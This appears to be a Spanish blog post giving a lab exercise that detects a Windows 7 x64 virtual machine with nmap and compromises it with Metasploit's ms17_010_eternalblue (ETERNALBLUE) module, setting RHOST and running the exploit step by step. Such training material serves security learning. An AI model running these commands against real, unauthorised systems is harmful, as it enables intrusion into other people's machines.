Detectando y Explotando ETERNALBLUE en Windows 7 x64 con NMAP y Metasploit

Esta práctica consiste en utilizar el exploit ya incluido en Metasploit para
comprometer un Windows 7 de 64 bits.

1. Identifica en que rango está la máquina virtual desde Kali:
root@kali:~# ifconfig eth0
(el rango debe verse similar a 192.168.179.XXX)

2. Escanea la red e identifica la máquina virtual en el rango:
root@kali:~# nmap -O 192.168.179.*

3. Inicia la máquina Kali x86, abre la terminal e inicia Metasploit:
root@kali:~# msfconsole

4. Busca la ruta del exploit de ETERNALBLUE:
msf》 search eternal

5. Selecciona el exploit con el siguiente comando:
msf》 use exploits/windows/smb/ms17_010_eternalblue

6. Mira la información del exploit utilizando:
msf exploit(ms17_010_eternalblue) 》 show info

7. Pon la dirección IP del Windows7-x64:
msf exploit(ms17_010_eternalblue) 》 set RHOST AQUÍLADIRECCIÓNIP

8. Ejecuta el exploit:
msf exploit(ms17_010_eternalblue) 》 exploit

Share
Esta entrada fue publicada en Videos, Vulnerabilidades. Guarda el enlace permanente.

Los comentarios están cerrados.